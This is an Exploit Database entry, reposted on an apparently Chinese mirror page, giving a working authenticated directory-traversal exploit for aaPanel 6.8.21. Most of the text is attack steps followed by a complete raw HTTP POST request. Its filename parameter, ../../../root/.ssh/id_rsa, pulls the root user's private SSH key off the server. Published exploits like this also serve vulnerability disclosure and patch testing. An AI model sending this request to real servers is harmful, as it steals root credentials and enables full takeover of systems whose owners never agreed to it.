aaPanel 6.8.21 – Directory Traversal (Authenticated)

• Exploit Database
• 38 阅读

• 作者： Ghuliev
  日期： 2022-02-23
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/50780/

• # Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
  # Date: 22.02.2022
  # Exploit Author: Fikrat Ghuliev (Ghuliev)
  # Vendor Homepage: https://www.aapanel.com/
  # Software Link: https://www.aapanel.com
  # Version: 6.8.21
  # Tested on: Ubuntu
  
  Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
  
  #Go to App Store
  
  #Click to "install" in any free plugin.
  
  #Change installation script to ../../../root/.ssh/id_rsa
  
  POST /ajax?action=get_lines HTTP/1.1
  Host: IP:7800
  Content-Length: 41
  Accept: */*
  X-Requested-With: XMLHttpRequest
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
  Safari/537.36
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Origin: http://IP:7800
  Referer: http://IP:7800/soft
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
  request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
  serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
  page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
  distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
  load_type=null; load_search=undefined; force=0; rank=list;
  Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
  path_dir_change=/www/wwwroot/
  Connection: close
  
  num=10&filename=../../../root/.ssh/id_rsa